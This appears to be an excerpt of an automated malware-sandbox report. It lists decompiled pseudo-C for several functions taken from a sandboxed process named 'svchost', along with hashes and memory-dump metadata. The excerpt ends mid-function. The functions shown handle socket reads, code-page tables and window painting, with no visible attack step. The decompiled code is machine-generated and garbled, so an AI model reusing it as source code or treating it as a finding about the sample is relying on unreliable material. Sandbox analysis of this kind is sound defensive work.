    • Opcode ID: cd1cd0cd265320a5edb096db0b4822c71cb40f976b767552976ca7bb101b2c1e
    • Instruction ID: 801251a0459e684a1d62c3a5ce3f24faf7e28c3b960e1234001016abeb21e4dd
    • Opcode Fuzzy Hash: cd1cd0cd265320a5edb096db0b4822c71cb40f976b767552976ca7bb101b2c1e
    • Instruction Fuzzy Hash: 2081D9B4500B048BCB25DF36C8907DAFBE8FFA4304F50496FD4AA47291DBB86648CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0042A2F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
    Download Yara Rule
    C-Code - Quality: 69%
    			E0042A2F0(intOrPtr* __ecx, char _a4, short _a8) {
				char _v0;
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v44;
				intOrPtr _v48;
				char _v64;
				signed int _v68;
				signed int _v76;
				char _v84;
				void* __edi;
				signed int _t52;
				void* _t54;
				unsigned int _t59;
				unsigned int _t64;
				signed int _t76;
				signed int _t77;
				signed int _t89;
				intOrPtr* _t98;
				intOrPtr* _t106;
				intOrPtr* _t111;
				intOrPtr* _t117;
				signed int _t119;
				char _t121;
				intOrPtr _t123;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E0048F1C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(_t76);
				_t111 = __ecx;
				_t77 = _t76 | 0xffffffff;
				if( *((intOrPtr*)(__ecx + 0x40)) != _t77) {
					if(_a8 != 0x20) {
						_t121 = _a4;
						_push( &_a4);
						_push(0x4004667f);
						_push(_t121);
						if( *0x4926bc() == 0) {
							if(_v8 < 1) {
								_v8 = 1;
							}
							E0040B5D0( &_v44);
							_v16 = 1;
							E0040B5D0( &_v64);
							_t117 =  *0x4926c4;
							_t52 = _v8;
							_v16 = 2;
							while(1) {
								_t54 =  *_t117(_t121, E0040B6C0( &_v64), _t52, _t52, 0);
								if(_t54 == _t77 || _t54 <= 0) {
									break;
								}
								asm("sbb ecx, ecx");
								_push(_t54);
								E0040BD00( &_v64,  ~_v68 & _v76);
								_t52 = 0x400;
								_v36 = 0x400;
							}
							if(_v48 != 0) {
								_t89 = 0;
								_t59 =  *(_t111 + 0x58) >> 2;
								if(_t59 > 0) {
									_t106 =  *((intOrPtr*)(_t111 + 0x50));
									while( *_t106 != _t121) {
										_t89 = _t89 + 1;
										_t106 = _t106 + 4;
										if(_t89 < _t59) {
											continue;
										} else {
										}
										goto L24;
									}
									 *((intOrPtr*)( *_t111 + 0xc0))( &_v64,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x60)) + _t89 * 4)));
								}
							}
							L24:
							_v36 = 1;
							_v84 = 0x496c28;
							E0040B7D0( &_v84);
							_v36 = _t77;
							_v64 = 0x496c28;
							E0040B7D0( &_v64);
						}
					} else {
						_t123 = _a4;
						_t64 =  *(__ecx + 0x58) >> 2;
						_t119 = 0;
						if(_t64 <= 0) {
							L9:
							E00429F80(_t111, _t123);
						} else {
							_t98 =  *((intOrPtr*)(__ecx + 0x50));
							while( *_t98 != _t123) {
								_t119 = _t119 + 1;
								_t98 = _t98 + 4;
								if(_t119 < _t64) {
									continue;
								} else {
									E00429F80(_t111, _t123);
								}
								goto L25;
							}
							_t79 = _t119 * 4;
							E0040BE80(_t111 + 0x48, _t111);
							E00483037( &_v0,  *((intOrPtr*)(_t111 + 0x60)) + _t79);
							_v16 = 0;
							E004825AC(_t111 + 0x5c, _t119, 1);
							 *((intOrPtr*)( *_t111 + 0xc8))(_v12, _t119 * 4, 4);
							_v28 = 0xffffffff;
							E004832C2( &_v16);
							goto L9;
						}
					}
					L25:
					 *[fs:0x0] = _v24;
					return 0;
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}
































    0x0042a2f6
    0x0042a2f8
    0x0042a2fd
    0x0042a2fe
    0x0042a308
    0x0042a30a
    0x0042a30c
    0x0042a312
    0x0042a331
    0x0042a3c4
    0x0042a3cc
    0x0042a3cd
    0x0042a3d2
    0x0042a3db
    0x0042a3ec
    0x0042a3ee
    0x0042a3ee
    0x0042a3f6
    0x0042a3ff
    0x0042a403
    0x0042a408
    0x0042a40e
    0x0042a412
    0x0042a417
    0x0042a426
    0x0042a42a
    0x00000000
    0x00000000
    0x0042a43a
    0x0042a43c
    0x0042a444
    0x0042a449
    0x0042a44e
    0x0042a44e
    0x0042a45a
    0x0042a45f
    0x0042a461
    0x0042a466
    0x0042a468
    0x0042a46b
    0x0042a46f
    0x0042a470
    0x0042a475
    0x00000000
    0x00000000
    0x0042a477
    0x00000000
    0x0042a475
    0x0042a489
    0x0042a489
    0x0042a466
    0x0042a48f
    0x0042a498
    0x0042a49d
    0x0042a4a1
    0x0042a4aa
    0x0042a4ae
    0x0042a4b2
    0x0042a4b2
    0x0042a337
    0x0042a33a
    0x0042a33e
    0x0042a341
    0x0042a345
    0x0042a3b7
    0x0042a3ba
    0x0042a347
    0x0042a347
    0x0042a34a
    0x0042a34e
    0x0042a34f
    0x0042a354
    0x00000000
    0x0042a356
    0x0042a359
    0x0042a359
    0x00000000
    0x0042a354
    0x0042a363
    0x0042a370
    0x0042a37f
    0x0042a38a
    0x0042a392
    0x0042a3a0
    0x0042a3aa
    0x0042a3b2
    0x00000000
    0x0042a3b2
    0x0042a345
    0x0042a4b7
    0x0042a4c1
    0x0042a4cb
    0x0042a314
    0x0042a31c
    0x0042a326
    0x0042a326

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID: 0-3916222277
    • Opcode ID: d2de074b3d45ce024631e1a5fb6468362857d0e7281a502ae09a33d0d596aeb6
    • Instruction ID: 55a9b4915954f33a131275ed66a1218e418ae8e2c13efbdafe410209530baeb2
    • Opcode Fuzzy Hash: d2de074b3d45ce024631e1a5fb6468362857d0e7281a502ae09a33d0d596aeb6
    • Instruction Fuzzy Hash: 6551BD712043519FC318EF15D891B6BB7A4FB94318F400A2EF94293280DB38EC55CB9B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00474269 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E00474269(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x4e1da4,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0047C0F8(1,  &_v280, 0x100,  &_v1304,  *0x4e1da4,  *0x4e1fc4, 0);
						E004783D4( *0x4e1fc4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4e1da4, 0);
						E004783D4( *0x4e1fc4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4e1da4, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x4e1dc0) =  *(_t55 + 0x4e1dc0) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x4e1ec1) =  *(_t55 + 0x4e1ec1) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x4e1dc0) = _t77;
								goto L16;
							}
							 *(_t55 + 0x4e1ec1) =  *(_t55 + 0x4e1ec1) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x4e1dc0) =  *(_t43 + 0x4e1dc0) & 0x00000000;
						} else {
							 *(_t43 + 0x4e1ec1) =  *(_t43 + 0x4e1ec1) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x4e1ec1) =  *(_t43 + 0x4e1ec1) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x4e1dc0) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























    0x00474286
    0x0047428c
    0x00474293
    0x00474293
    0x0047429a
    0x0047429b
    0x0047429f
    0x004742a2
    0x004742ab
    0x004742e4
    0x00474303
    0x00474327
    0x0047434f
    0x00474357
    0x00474359
    0x0047435f
    0x0047435f
    0x00474365
    0x00474380
    0x00474392
    0x00000000
    0x00474392
    0x00474382
    0x00474389
    0x00474375
    0x00474375
    0x00000000
    0x00474375
    0x00474367
    0x0047436e
    0x00000000
    0x00474399
    0x00474399
    0x0047439b
    0x0047439c
    0x00000000
    0x0047435f
    0x004742af
    0x004742b2
    0x004742b2
    0x004742b5
    0x004742ba
    0x004742be
    0x004742c5
    0x004742cd
    0x004742d7
    0x004742d7
    0x004742d7
    0x004742da
    0x004742db
    0x004742de
    0x00000000
    0x004742e3
    0x004743a2
    0x004743a9
    0x004743ac
    0x004743ca
    0x004743df
    0x004743d1
    0x004743d1
    0x004743da
    0x00000000
    0x004743da
    0x004743b3
    0x004743b3
    0x004743bc
    0x004743bf
    0x004743bf
    0x004743bf
    0x004743e6
    0x004743e7
    0x004743ed

    APIs
    • GetCPInfo.KERNEL32(?,00000000), ref: 0047427D
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Info
    • String ID: $
    • API String ID: 1807457897-3032137957
    • Opcode ID: 4af0ae1dbb743f000496c0ebf1c9b6ddeae5726f43500738d9f8be7b17881da0
    • Instruction ID: 485a8cbd048e1ba2025a6b054ecbb9a23ba9fe16882a88f09e268822e1e60195
    • Opcode Fuzzy Hash: 4af0ae1dbb743f000496c0ebf1c9b6ddeae5726f43500738d9f8be7b17881da0
    • Instruction Fuzzy Hash: EF4189301442D85EEB128724DD89FFB3FD8AB42704F1444E7E98DCA1A3C3794958CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0042A090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
    Download Yara Rule
    C-Code - Quality: 51%
    			E0042A090(intOrPtr* __ecx) {
				intOrPtr _t34;
				void* _t36;
				intOrPtr _t64;
				intOrPtr* _t67;
				intOrPtr _t74;
				void* _t75;

				_push(0xffffffff);
				_push(E0048F1A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t74;
				_t75 = _t74 - 0x28;
				_t71 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x40)) != 0xffffffff) {
					if( *((short*)(_t75 + 0x40)) != 0x20) {
						_t64 =  *((intOrPtr*)(_t75 + 0x40));
						_push(_t75 + 0x44);
						_push(0x4004667f);
						_push(_t64);
						if( *0x4926bc() == 0) {
							if( *((intOrPtr*)(_t75 + 0x44)) < 1) {
								 *((intOrPtr*)(_t75 + 0x44)) = 1;
							}
							E0040B5D0(_t75 + 0x20);
							 *((intOrPtr*)(_t75 + 0x3c)) = 0;
							E0040B5D0(_t75 + 0xc);
							_t67 =  *0x4926c4;
							_t34 =  *((intOrPtr*)(_t75 + 0x48));
							 *((char*)(_t75 + 0x3c)) = 1;
							while(1) {
								_t36 =  *_t67(_t64, E0040B6C0(_t75 + 0x18), _t34, _t34, 0);
								if(_t36 == 0xffffffff || _t36 <= 0) {
									break;
								}
								asm("sbb ecx, ecx");
								_push(_t36);
								E0040BD00(_t75 + 0x28,  ~( *(_t75 + 0x1c)) &  *(_t75 + 0x14));
								_t34 = 0x400;
								 *((intOrPtr*)(_t75 + 0x48)) = 0x400;
							}
							if( *((intOrPtr*)(_t75 + 0x30)) != 0) {
								 *((intOrPtr*)( *_t71 + 0xc0))(_t75 + 0x20);
							}
							 *((char*)(_t75 + 0x3c)) = 0;
							 *((intOrPtr*)(_t75 + 0xc)) = 0x496c28;
							E0040B7D0(_t75 + 0xc);
							 *((intOrPtr*)(_t75 + 0x3c)) = 0xffffffff;
							 *((intOrPtr*)(_t75 + 0x20)) = 0x496c28;
							E0040B7D0(_t75 + 0x20);
						}
					} else {
						 *((intOrPtr*)( *__ecx + 0xc4))();
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t75 + 0x30));
					return 0;
				} else {
					 *[fs:0x0] =  *((intOrPtr*)(_t75 + 0x28));
					return 0;
				}
			}









    0x0042a096
    0x0042a098
    0x0042a09d
    0x0042a09e
    0x0042a0a5
    0x0042a0a9
    0x0042a0af
    0x0042a0cc
    0x0042a0de
    0x0042a0e6
    0x0042a0e7
    0x0042a0ec
    0x0042a0f5
    0x0042a100
    0x0042a102
    0x0042a102
    0x0042a10f
    0x0042a118
    0x0042a120
    0x0042a125
    0x0042a12b
    0x0042a12f
    0x0042a134
    0x0042a143
    0x0042a148
    0x00000000
    0x00000000
    0x0042a158
    0x0042a15a
    0x0042a162
    0x0042a167
    0x0042a16c
    0x0042a16c
    0x0042a178
    0x0042a184
    0x0042a184
    0x0042a193
    0x0042a198
    0x0042a19c
    0x0042a1a5
    0x0042a1ad
    0x0042a1b1
    0x0042a1b6
    0x0042a0ce
    0x0042a0d3
    0x0042a0d3
    0x0042a1bf
    0x0042a1c9
    0x0042a0b1
    0x0042a0b8
    0x0042a0c2
    0x0042a0c2

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID: 0-3916222277
    • Opcode ID: 3282144baf856ce8d5ed66fdba80f323df557589344fa089d17ac06c49687da6
    • Instruction ID: 426b3fdd22b07ce8414f359718db4965312d4c96e341c689398986923b2b8b30
    • Opcode Fuzzy Hash: 3282144baf856ce8d5ed66fdba80f323df557589344fa089d17ac06c49687da6
    • Instruction Fuzzy Hash: CC316A71208344AFD718DF24C850B6BB7F4FB94724F444A2EF896932D0DB78A9158B9B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414340 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00414340(void* __ecx, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _t15;
				void* _t22;
				void* _t24;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;
				struct HWND__* _t33;
				struct HWND__* _t34;
				signed int* _t35;

				_t35 =  &_v8;
				_t34 = _a4;
				_t29 = __ecx + 0x14;
				_v8 = 0;
				_v4 = _t29;
				do {
					_t24 = 0;
					while(1) {
						_t28 = E004135B0(_t29, _t24, 0);
						if(_t28 == 0) {
							break;
						}
						_t27 = _t29;
						if(E00413C90(_t29, _t24) != 0) {
							L12:
							_t24 = _t24 + 1;
							continue;
						} else {
							_t5 = _t28 + 0x18; // 0x18
							_t30 = _t5;
							_t31 = _t30 + E0040C020(_t27, _t30);
							_t15 = E0040C020(_t27, _t31);
							_t35 =  &(_t35[2]);
							_t33 =  *(_t31 + _t15);
							if(_t33 != 0) {
								_t33 =  *(_t33 + 0x1c);
							}
							if(_t33 == _t34) {
								if(_t24 == 0) {
									goto L16;
								} else {
									goto L18;
								}
							} else {
								if(_t33 == 0) {
									L11:
									_t29 = _v4;
									goto L12;
								} else {
									_t22 = E00418A40(0x3ea,  *_t28, 0);
									if(_t22 == 0 || ( *(_t22 + 0x14) & 0x00200200) == 0 || IsChild(_t33, _t34) == 0) {
										goto L11;
									} else {
										L18:
										return _t24;
									}
								}
							}
						}
						L19:
					}
					_t15 = _a8;
					if(_t15 == 0) {
						break;
					} else {
						_t15 = GetParent(_t34);
						_t34 = _t15;
						if(_t34 == 0) {
							break;
						} else {
							goto L15;
						}
					}
					goto L19;
					L15:
					_t15 = _v8 + 1;
					_v8 = _t15;
				} while (_t15 <= 1);
				L16:
				return _t15 | 0xffffffff;
				goto L19;
			}















    0x00414340
    0x00414345
    0x0041434a
    0x0041434e
    0x00414356
    0x0041435a
    0x0041435a
    0x0041435c
    0x00414366
    0x0041436a
    0x00000000
    0x00000000
    0x0041436d
    0x00414376
    0x004143cb
    0x004143cb
    0x00000000
    0x00414378
    0x00414378
    0x00414378
    0x00414381
    0x00414384
    0x0041438b
    0x0041438e
    0x00414392
    0x00414394
    0x00414394
    0x00414399
    0x00414404
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041439b
    0x0041439d
    0x004143c7
    0x004143c7
    0x00000000
    0x0041439f
    0x004143a9
    0x004143b0
    0x00000000
    0x00414408
    0x00414408
    0x0041440f
    0x0041440f
    0x004143b0
    0x0041439d
    0x00414399
    0x00000000
    0x00414376
    0x004143ce
    0x004143d4
    0x00000000
    0x004143d6
    0x004143d7
    0x004143dd
    0x004143e1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004143e1
    0x00000000
    0x004143e3
    0x004143e7
    0x004143eb
    0x004143eb
    0x004143f8
    0x004143ff
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ChildParent
    • String ID: ^I
    • API String ID: 1702929569-3473481074
    • Opcode ID: 3e08dbe5542ed707e6b28ba5f42d933fde0c0fed3bea102f5bf1efa6b1730ff0
    • Instruction ID: ea2d897dc0ac92a195663b1b330dc330137d0b93aa0a1fc9f3baaf09dc14762c
    • Opcode Fuzzy Hash: 3e08dbe5542ed707e6b28ba5f42d933fde0c0fed3bea102f5bf1efa6b1730ff0
    • Instruction Fuzzy Hash: 4921DA327003195BD6116E556C40BDBB398AFC0719F05062BFD60A7381EB58ED9986EA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00413010 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E00413010(void* __ebx, void* __ecx, void* __ebp) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				char _v36;
				char _v52;
				char _v96;
				struct HDC__* _v100;
				struct tagRECT _v120;
				char _v124;
				intOrPtr _v128;
				char _v140;
				char _v148;
				char _v168;
				void* _t31;
				void* _t32;
				void* _t37;
				struct HBRUSH__* _t38;
				intOrPtr _t45;
				void* _t48;
				void* _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t74;
				void* _t82;

				_t73 = __ebp;
				_t48 = __ebx;
				_push(0xffffffff);
				_push(E0048E1C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t74;
				_t70 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x484)) != 1) {
					L7:
					_t31 = E0042DC80(_t48, _t70, _t66, __eflags, _t82);
					 *[fs:0x0] = _v12;
					return _t31;
				} else {
					_t32 = E0042D860(__ecx);
					_t79 = _t32;
					if(_t32 != 0) {
						goto L7;
					} else {
						_push(__ecx);
						E00489D7E( &_v96, _t79);
						_v8 = 0;
						E0048992F( &_v100,  &(_v120.top));
						if(IsRectEmpty( &_v120) == 0) {
							_push( *((intOrPtr*)(_t70 + 0x40)));
							_t38 = E00489F7B( &_v124);
							_t81 = _t38;
							if(_t38 != 0) {
								_t38 =  *(_t38 + 4);
							}
							FillRect(_v100,  &_v120, _t38);
							_v140 = 0x495e6c;
							_t13 =  &_v140; // 0x495e6c
							_v24 = 1;
							E00489F15(_t13);
							_v24 = 0;
							E004896A6(E004895EE( &(_v120.top), 1),  &_v120, 0);
							_t45 =  *((intOrPtr*)(E00483330( &_v148, _t73, 0x4accf8)));
							_v36 = 2;
							 *((intOrPtr*)(_v128 + 0x5c))(0xa, 0xa, _t45,  *((intOrPtr*)(_t45 - 8)));
							_t24 =  &_v168; // 0x495e6c
							_v52 = 0;
							E004832C2(_t24);
						}
						_v8 = 0xffffffff;
						_t37 = E00489DF0( &_v100, _t81);
						 *[fs:0x0] = _v16;
						return _t37;
					}
				}
			}




























    0x00413010
    0x00413010
    0x00413016
    0x00413018
    0x0041301d
    0x0041301e
    0x00413029
    0x00413032
    0x00413126
    0x00413128
    0x00413132
    0x0041313c
    0x00413038
    0x00413038
    0x0041303d
    0x0041303f
    0x00000000
    0x00413045
    0x00413045
    0x0041304a
    0x00413058
    0x00413060
    0x00413072
    0x0041307f
    0x00413080
    0x00413085
    0x00413087
    0x00413089
    0x00413089
    0x00413097
    0x0041309d
    0x004130a5
    0x004130a9
    0x004130ae
    0x004130b9
    0x004130c9
    0x004130dc
    0x004130e2
    0x004130f4
    0x004130f7
    0x004130fb
    0x00413100
    0x00413100
    0x00413109
    0x00413111
    0x0041311b
    0x00413125
    0x00413125
    0x0041303f

    APIs
      • Part of subcall function 00489D7E: __EH_prolog.LIBCMT ref: 00489D83
      • Part of subcall function 00489D7E: BeginPaint.USER32(?,?,?,?,0040D2F9), ref: 00489DAC
      • Part of subcall function 0048992F: GetClipBox.GDI32(?,?), ref: 00489936
    • IsRectEmpty.USER32(?), ref: 0041306A
      • Part of subcall function 00489F7B: __EH_prolog.LIBCMT ref: 00489F80
      • Part of subcall function 00489F7B: CreateSolidBrush.GDI32(?), ref: 00489F9D
    • FillRect.USER32(?,?,00000000), ref: 00413097
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: H_prologRect$BeginBrushClipCreateEmptyFillPaintSolid
    • String ID: l^I
    • API String ID: 3827101677-2511626936
    • Opcode ID: 68bf0b0b5bf173ae0400dee28dac57896438c08ad355e14099842d38aed58aec
    • Instruction ID: d5906ff5afb0536b9bff8c11eed8a8cbc7486ae63db0c65ab173c6c0df60b278
    • Opcode Fuzzy Hash: 68bf0b0b5bf173ae0400dee28dac57896438c08ad355e14099842d38aed58aec
    • Instruction Fuzzy Hash: 3231AE31108B40AFD314EF21C885BAFB7E4BB98714F144D1EF5A683291DB78DA04CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041AA80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E0041AA80(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr _t30;

				_push(__ecx);
				_v8 = __ecx;
				if( *((intOrPtr*)(_v8 + 0x284)) != 1) {
